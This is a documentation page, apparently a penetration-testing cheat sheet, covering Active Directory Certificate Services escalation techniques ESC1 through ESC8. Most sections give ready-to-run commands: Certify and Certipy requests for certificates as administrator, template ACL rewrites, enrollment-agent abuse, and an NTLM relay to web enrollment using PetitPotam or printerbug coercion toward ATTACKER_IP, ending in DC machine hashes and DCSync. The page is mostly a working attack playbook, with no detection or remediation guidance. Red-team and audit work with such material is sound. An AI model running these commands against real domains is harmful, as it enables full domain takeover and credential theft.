Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

ESC1 — SAN in Template

Template allows enrollee to specify Subject Alternative Name (SAN). Request cert as any user.

Conditions

  • ENROLLEE_SUPPLIES_SUBJECT flag set
  • Client Authentication EKU
  • Low-privilege user can enroll

Certify

.\Certify.exe request /ca:CA_HOSTNAME\CA_NAME /template:VulnerableTemplate /altname:administrator

Certipy

certipy req -u [email protected] -p 'password' -ca CA_NAME -template VulnerableTemplate -upn [email protected] -dc-ip DC_IP
certipy auth -pfx administrator.pfx -dc-ip DC_IP

ESC2 — Any Purpose / No EKU

Template has Any Purpose EKU or no EKU at all → can be used for client auth.

Exploit

Same as ESC1 if ENROLLEE_SUPPLIES_SUBJECT also set. Otherwise combine with ESC3 (enrollment agent).

ESC3 — Enrollment Agent

Two-step: enroll as enrollment agent, then request cert on behalf of another user.

Step 1 — Get Enrollment Agent Cert

certipy req -u [email protected] -p 'pass' -ca CA_NAME -template EnrollmentAgent

Step 2 — Request on Behalf Of

certipy req -u [email protected] -p 'pass' -ca CA_NAME -template User -on-behalf-of 'DOMAIN\administrator' -pfx enrollment_agent.pfx

ESC4 — Template ACL

Write access to certificate template → modify template to be vulnerable (ESC1).

Certipy

certipy template -u [email protected] -p 'pass' -template VulnTemplate -save-old
# Template now vulnerable to ESC1
certipy req -u [email protected] -p 'pass' -ca CA_NAME -template VulnTemplate -upn [email protected]
# Restore
certipy template -u [email protected] -p 'pass' -template VulnTemplate -configuration VulnTemplate.json

ESC5 — PKI Object ACL

Write access to CA server AD object, CA config, or PKI-related objects. Broad scope — depends on specific misconfiguration.

ESC6 — EDITF_ATTRIBUTESUBJECTALTNAME2

CA flag EDITF_ATTRIBUTESUBJECTALTNAME2 allows SAN in any certificate request, regardless of template config.

Check

certipy find -u user -p pass -dc-ip DC -stdout | grep -i "User Specified SAN"

Exploit

Same as ESC1 — specify SAN in any template: 
certipy req -u [email protected] -p 'pass' -ca CA_NAME -template User -upn [email protected]

ESC7 — CA ACL (ManageCA)

User has ManageCA or ManageCertificates on CA → enable ESC6 flag or approve pending requests.

Enable EDITF_ATTRIBUTESUBJECTALTNAME2

certipy ca -ca CA_NAME -u [email protected] -p 'pass' -enable-flag EDITF_ATTRIBUTESUBJECTALTNAME2
Then exploit as ESC6.

Approve Pending Requests

# Request with SAN (will be pending)
certipy req -u user -p pass -ca CA_NAME -template User -upn [email protected]

# Approve
certipy ca -ca CA_NAME -u user -p pass -issue-request REQUEST_ID

# Retrieve
certipy req -u user -p pass -ca CA_NAME -retrieve REQUEST_ID

ESC8 — NTLM Relay to Web Enrollment

CA has HTTP enrollment endpoint → relay NTLM authentication to get certificate as victim.

Setup Relay

impacket-ntlmrelayx -t http://CA_IP/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

Coerce Authentication

python3 PetitPotam.py ATTACKER_IP DC_IP
# or
python3 printerbug.py DOMAIN/user:pass@DC_IP ATTACKER_IP

Use Certificate

certipy auth -pfx dc.pfx -dc-ip DC_IP
# Returns DC machine hash → DCSync

Quick Reference

ESCKey ConditionExploit
ESC1SAN + low-priv enrollRequest cert with -upn admin
ESC2Any Purpose EKUSimilar to ESC1
ESC3Enrollment AgentTwo-step: agent cert → on-behalf-of
ESC4Write template ACLModify template → ESC1
ESC6EDITF flagSAN in any template
ESC7ManageCA permEnable ESC6 or approve requests
ESC8HTTP enrollmentNTLM relay to CA